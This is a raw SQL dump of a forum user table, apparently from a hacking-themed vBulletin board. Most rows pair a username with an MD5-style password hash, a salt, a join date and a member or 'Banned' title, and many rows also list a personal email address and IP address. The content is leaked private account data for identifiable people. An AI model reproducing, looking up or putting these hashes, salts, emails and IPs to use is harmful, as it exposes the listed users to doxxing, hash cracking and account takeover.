(38, 7, '', 0, 'systemmain', '5b0806dbd9736ee52f44f5117b68a2bd', '2014-08-12', '', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1407866580, -1, 1407866661, 1407867120, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'Mz:KtZ.er@V{+l{~K7m[,eZH)R%fln', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(39, 2, '', 0, 'lumbricus', '39e709e713cb3a5fb528926a83825abf', '2014-08-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1407928740, -1, 1442120635, 1442120635, 1428046569, 2258, 20, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 5, 0, '(.RYpbQBl*W<(Pt_^pD+1$&%~Ru_Y[', 0, 0, 0, '', 0, 0, 93, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''),
(40, 2, '', 0, 'opensc', '5679d72c45c4caea5e9b4ba7897abce9', '2015-03-26', 'cylonzero@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1407931440, -1, 1438255106, 1438255080, 1409582160, 1873, 3, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 0, 'V8k>XQg+B\"i`eT`uzA?!riVMs]>/Gm', 0, 0, 0, '', 0, 0, 95, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(41, 2, '', 0, '123', '739341597fb0f75ce8ce230461b7705f', '2015-09-20', '', 0, '', '', '', '', '', '', '', 1, 0, 'Member', 0, 1408101960, -1, 1445786886, 1445851503, 1445786886, 2896, 19, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, ']=987JL@IiP..J5O0t@#Tp<|Y\'TE$e', 0, 0, 0, '', 0, 0, 64, 0, 0, 3, 0, 0, 0, 0, 0, 0, '', ''),
(42, 8, '', 0, 'jerzyboyz', '4ce03897fc5b10dda2feee73c87d5567', '2014-08-19', '', 0, '', '', '', '', '', '', '', 1, 0, '×ðñûþúøрþòðý', 0, 1408441920, -1, 1411259347, 1411404398, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, 'E=${jYzqtI[dUh/B@fDT.ejn5&?>?A', 0, 0, 0, '', 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(43, 2, '', 0, 'Saplt', 'db30d7474120fe2d860a5a427afd9530', '2014-08-23', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1408796100, -1, 1409039833, 1409041889, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '_%W=:;:D:44l;.>]-R|(9^%uJHV(4|', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(44, 2, '', 0, 'l3n0', '1d16d91b12dce1a4c53cf565f9718087', '2014-08-24', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1408883160, -1, 1466179509, 1471427686, 1411057864, 2103, 2, 10, 5, '3', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 2, '3{(#7M|\\HPnb6F^yB;H+j,tSYHHN%wnpd', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(102, 2, '', 0, 'mastermind', 'c8af7c98f71dcd31cb5aef96e1298b91', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420474200, -1, 1465099425, 1466546629, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'j:QZ$&G-mTZeT\\[t$kX7\'llAFt_[.CJ~XL', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(111, 8, '', 0, 'Independent', 'f995bbe230bc74387ece272819e8ce21', '2015-01-05', 'c3035004@trbvm.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420479960, 0, 1420480426, 1420667940, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '81.22.133.104', 0, 1, 0, 0, -1, 0, 0, 'eWgx:p=(q)qOg0t\"=k@bz,CM{fZo&a0vBGMa/\"f1kj=Y.H3K$(3', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(114, 2, '', 0, 'xmpp', '058968453491ef2fbcf0825cb755334a', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420480740, -1, 1420480793, 1420480740, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ';D==/Yl\\qYdXrY!Zj2>ODiJ>X?M-*%', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(115, 2, '', 0, 'trickstr', '5f467d4b92d667ba340212fc290263c1', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420480860, -1, 1420997251, 1421012437, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '9{a3%HG!pqv-g?)G`Qr`bC]2\'T+L_y', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(116, 2, '', 0, 'g0rx', 'edca3c9fc9d51703467d3bbc415585d9', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420481160, -1, 1425728899, 1438260951, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '#oI\"kc%V)ON@Lp.Y2yoBArJL|Y;xQZ', 0, 0, 0, '', 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(117, 2, '', 0, 'spawn', 'b3c30c20ba676a1a179ec7c9f9510228', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420484460, -1, 1420484561, 1420485938, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '[Er{VPWi=7IW0*8nz&]0\':?C([%V8}', 0, 0, 0, '', 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(118, 8, '', 0, 'pepeasd', '4ea5a9943329a04a64d45e5e5564bee8', '2015-01-07', 'economistawannabe@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648020, 0, 1420648730, 1420657980, 0, 0, 0, 10, 5, '-3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '190.225.82.37', 0, 1, 0, 0, -1, 0, 0, 'vTUNY:`v=2Ud`~I#y7UMoMM-u%l=@$', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(119, 8, '', 0, 'demonic', '5e8658021452526b7b4c55ada4b60580', '2015-01-07', 'hbhmvymn@sharklasers.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648080, 0, 1425295351, 1425305880, 1420649700, 2225, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '199.254.238.139', 0, 1, 0, 0, -1, 0, 0, 'fFdG9\"`-`5f-Uo8kAEoIR3R3GfSHm@#km.b8,&Q?DP2wbo', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(122, 8, '', 0, 'iAbdO', '43a00345860d8e27fa7ad81366d43fd9', '2015-01-07', 'globalinternetnews@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648080, 0, 1420648405, 1420648380, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '178.135.107.245', 0, 1, 0, 0, -1, 0, 0, '~PH9=ovJt$XQFM~&%q/Q#i<@Sc]!y`', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(123, 2, '', 0, 'zer0', 'd58c293b1e440f56aaeed69b6d4165bf', '2015-01-07', 'gokaijou@guerillamail.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420648139, 0, 1420648739, 1420649715, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '5.79.86.129', 0, 1, 0, 0, -1, 0, 0, 'mh@,-*\'T-NkD@\\dbJIXY5Zt}\'6G35R', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(124, 8, '', 0, 'mrsxypants', '44223e91b63a7e28b650a83175d81bac', '2015-01-07', 'compwizard.t@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648140, 0, 1420648143, 1420648140, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '184.209.8.111', 0, 1, 0, 0, -1, 0, 0, 'g1m\"=q2=W+b!,*\'&]KY46nuj2pL~|b', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(125, 2, '', 0, 'surgeonsblade', '64a22ccd423a70e94961907f7c08a913', '2015-01-07', 'elvir.besic@global.net.ba', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420648182, 0, 1420648182, 1420648258, 0, 0, 0, 10, 5, '1', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '109.175.97.116', 0, 1, 0, 0, -1, 0, 0, '@lKZw6,H(4XvEASC>94mb\\J>J)t', 0, 0, 0, '', 0, 0, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(134, 8, '', 0, 'dw0rd', 'f3d58628f6996dcd8de8cd1a11f7dffa', '2015-01-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421150700, -1, 1421152567, 1421252520, 1421152440, 2237, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '\\!!blyaajh:QW{5Uw!Lf@>w%@87HMP', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(135, 2, '', 0, 'reversing4', '9d51a78fc775ecc628db65dde826d993', '2015-01-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421156340, -1, 1466041138, 1466632458, 1427668463, 2251, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 5, 0, '~jgBH])}bchM\\`!HK=puiW{L.s@\'\'x', 0, 0, 0, '', 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(136, 2, '', 0, 'y0d4', 'badbd226fe715b33824613665a879ce3', '2015-01-19', 'm45t3r.y0d4@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680612, 0, 1464043417, 1464043417, 0, 0, 0, 10, 5, '1', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '77.243.16.36', 0, 1, 0, 0, -1, 0, 0, '}H>P~Dz!%!Jd|Np^R{4V/+f*s6-txm', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(137, 8, '', 0, 'chirag7766', '8e85fa703414c712ddb6ba8b9bc12c11', '2015-01-19', 'chirag7766@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680620, 0, 1421681129, 1421681100, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '112.196.110.152', 0, 1, 0, 0, -1, 0, 0, '(\"\'I[I{N!/5sT?8iXY(N~QO>T?JMbRXHq(', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(139, 8, '', 0, 'nikocuy', '9ac5c9856c353659b859c7f196ec3f6f', '2015-01-19', 'kevinlie8899@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1464043482, 1464043482, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '139.195.63.2', 100, 1, 0, 0, -1, 0, 0, ')3`()Dp7Q@3=X`&c)Sj,A+lzq((n#N', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(140, 8, '', 0, 'hok3', '314a000c890ce14db8b1c04276a516a2', '2015-01-19', 'xhokex@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1421680710, 1421680680, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '186.37.202.33', 0, 1, 0, 0, -1, 0, 0, '3jb%\"4D5P|uV`}*K+KVwFI~M8#{u/]', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(141, 8, '', 0, 'monkeyfromthejungle', 'c8ec27d1d127ad4e2e9daa9e9d6f821a', '2015-01-19', 'm_krzywy@o2.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1421680736, 1421680860, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '31.172.185.131', 0, 1, 0, 0, -1, 0, 0, 'uD,,9`JPK$+RQF%y[VFr=t\\2LH.MoQ', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(142, 8, '', 0, 'chikonino', '5cc8510178f215d38fdea9e7e399794f', '2015-01-19', 'saidanikhaled@ymail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680740, 0, 1421680767, 1421681460, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '105.101.50.152', 0, 1, 0, 0, -1, 0, 0, '\\[d5CBjp:xCpLje}K=KDuOhHqK+OY0', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(143, 2, '', 0, 'SADAB', '0176c95cc4c80f4e496cdd73f3461e04', '2015-01-19', 'SADAB6825@GMAIL.COM', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680780, 0, 1421680780, 1421681451, 0, 0, 0, 10, 5, '5.5', 0, 0, 0, 0, 0, 45091927, '07-28-1999', '1999-07-28', -1, -1, '117.225.127.50', 0, 1, 0, 0, -1, 0, 0, '/7<_a?i5p1:jkp1_.\'<@RcM!S~J:t!', 0, 0, 0, '', 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(144, 2, '', 0, 'r0ckcrash', '0fbc0181dbd9f6e55cc2b0f4914b9344', '2015-01-19', 'r0ckcrash@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680781, 0, 1421680781, 1421680891, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '187.192.208.204', 0, 1, 0, 0, -1, 0, 0, 'rD.73{.AO2m{WWLMr;RVHOwh};vS*|-Xv9-M6$Ao]j9!7a$W*', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(148, 2, '', 0, 'greptodeath', 'b15969c0f90d4b95c72f625ceeb423e5', '2015-01-19', 'osdifum23lkfsd@openmailbox.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680930, 0, 1425995359, 1440515301, 0, 0, 0, 10, 5, '2', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '62.210.74.143', 0, 1, 0, 0, -1, 0, 0, ',G@Hc$&l|,Ip*?rvZP)iVpsO:*@bjr', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(149, 8, '', 0, 'JLCO', 'f1f48dea24ad6b767475ed6dab7da8ee', '2015-01-19', 'jolucaor@live.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680920, 0, 1421680957, 1421680980, 0, 0, 0, 10, 5, '-5', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '181.39.31.18', 0, 1, 0, 0, -1, 0, 0, 'er=ixh]qSFQeq=]Z\'Z56[ga1@oQx,=', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(150, 2, '', 0, 'Omega', '1e41787c7d8cfc9ca4effba5b3198984', '2015-01-19', 'omeganuller@unseen.is', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421681022, 0, 1464042682, 1464042682, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '112.135.171.11', 0, 1, 0, 0, -1, 0, 0, 'wPNq>B.``cJ1F;S2GnoJFYb', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(154, 2, '', 0, 'TetraQ', 'fd18206a9d8efab97204fce15fcbf171', '2015-01-19', 'sonarius@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421681239, 0, 1454706845, 1454706845, 1422274910, 2246, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '79.134.209.106', 0, 1, 0, 0, -1, 0, 0, 'dttZJsWpf%qyxR=m4HUMfOXWp', 0, 0, 0, '', 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(161, 2, '', 0, 'negeeb', 'fc3ca705c31f797349ceaafd2e338a5d', '2015-03-27', 'negeeb@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1427456820, -1, 1472797237, 1473327317, 1453453075, 2980, 2, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'W3v{)srsxT`a62,6CfP/n\"c,!BnED=', 0, 0, 0, '', 0, 0, 80, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(162, 2, '', 0, 'm0rivrty', 'a316385e10f39beaafeb0d4a0185790b', '2015-03-31', 'm0rivrty@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1427822040, -1, 1444196347, 1444198291, 1427831557, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '@Q|xqb\"aJ;@+|7:\'u|z)y0c\'Nf>N.l', 0, 0, 0, '', 0, 0, 143, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(163, 2, '', 0, 'Fuhrer666', 'ac27cfc876680eb5127646234fbe0467', '2015-06-25', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435253220, -1, 1474248758, 1474248758, 1443045788, 2824, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '!Xy*XR^tgXZbF9/$xxoOP?KSx@ax|Q', 0, 0, 0, '', 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(164, 2, '', 0, '*Hash*', '41599d14321f9f7c196e5ed48dea5234', '2016-05-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435594080, -1, 1467938046, 1469896978, 1449588720, 0, 4, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 3, 0, 'dPYXlpjI/{@~hh>fXSbwgl>j(tR`;b', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(165, 2, '', 0, 'Versus71', 'adfb30af0ed9d89eb85ec7457ab04657', '2015-06-30', 'xakep71@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435678980, -1, 1442981230, 1443171699, 1442089093, 2697, 2, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 0, 'a]6Lzc~#fL1^L\"Qp5\\aALqIX/5!l[g', 0, 0, 0, '', 0, 0, 71, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(166, 2, '', 0, 'gilgil', 'e0f2ba360e27d5e307169d2ab793bc0c', '2015-07-01', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435748280, -1, 1465842134, 1465842134, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, 'v0%6o:%H6u=r%M@#dvL%oQeiYR}x2R', 0, 0, 0, '', 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(168, 2, '', 0, 'moloon', '3009fd6bd0efc54d36d3819ca0dca82f', '2015-07-30', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1438252740, -1, 1443430542, 1447759915, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'i]sA*7IS!bJE3>j*3sj1AjC!?AJZ+!', 0, 0, 0, '', 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(169, 2, '', 0, 'intrip', '812d47c80a35d5737550593adae6345e', '2015-08-08', 'iintrip@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1439047080, -1, 1465211768, 1465293488, 1447331945, 2921, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '-Yv73Rfwj~S', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(176, 2, '', 0, 'GreenMan', 'cb57fd43763244eec0c438e88031fe2a', '2015-09-02', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1441204080, -1, 1441205093, 1442128017, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ':V$@yf?dX:(B3}oa0+OusELUQUS}z\"', 0, 0, 0, '', 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(177, 2, '', 0, 'ElihuYale', 'e37d3745540cdee62b3a4da8f14ea52c', '2015-09-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442435340, -1, 1461082316, 1461948298, 1443374539, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '\"a.-*>-cxaC2^c?JgRqA0.)449$!PE', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(178, 2, '', 0, 'dark001', '0c1343f361d10e226cf026c3abf106c9', '2015-09-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442435460, -1, 1466429858, 1472107160, 1457865814, 2979, 4, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 10, 0, 'IEWFKqjal:3l4^Y\'6ZfI[l>*>|\"M.$', 0, 0, 0, '', 0, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(179, 2, '', 0, 'sisi1337', '7145391329ed7ee633fc4e612760e4e6', '2015-09-18', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442575920, -1, 1442575973, 1442575920, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'R6N7e}^', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(181, 2, '', 0, 'deadeye', '81a20eacfab8a887a7f2a56519856fae', '2015-09-20', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442745600, -1, 1458821654, 1458908324, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'd8(}Mn^TeVRS\"7.&e`6Lrj^bQ@vt8o', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(182, 8, '', 0, 'sAv', '1b8e58a357915a15e3daa04d9f2a29b4', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1442805420, -1, 1442845798, 1443026220, 1442835900, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '&mZdbNB7tvth+Ox{x5LL;yM&8Xnb2g', 0, 0, 0, '', 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(183, 2, '', 0, 'zoom', '5db6285e1ca7873c0c0c8c860da2b87f', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442831220, -1, 1442937801, 1443030198, 1442833514, 2778, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 1, '\'tr-Mt~~j{%N_tI)z1izj?=\'o1Qbs}', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(184, 2, '', 0, 'wearymax', '4e8ff18ac332538499796dd4792451ea', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442848080, -1, 1442848080, 1442993933, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '@W%*JC|?1#0&Fn#1-{q\"*/hvrSEm4G', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(185, 2, '', 0, 'AD0', '7de29677189f90d1b4c6c42e9ac6c606', '2015-09-22', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442924820, -1, 1443087666, 1453209982, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '=:^Q$&U*F44p<7~6nQC?G,`l@', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(187, 2, '', 0, 'r00t1337', 'aa14f7aa817fa5458e9980bbfb8f842f', '2015-09-24', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1443129300, -1, 1443214599, 1443720098, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '43[Gks;O;FX2mcj>N#Lp4wb~gD.rsQ', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(188, 2, '', 0, 'DocXor', '974de389ae66767386d2ef37500ca9a8', '2015-10-03', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1443897900, -1, 1445343499, 1447770120, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'foZtIfLQqD4a6XeO6e\'!@GJ2Phb\\rc', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(189, 2, '', 0, 'BlackOS', '20b11b899963cc35d87cf3a1ff45d01a', '2015-10-10', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1444496160, -1, 1444496184, 1444496160, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'i\\aX8AAy{vp?-z7h-{rOM@iFNZw$XB', 0, 0, 0, '', 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
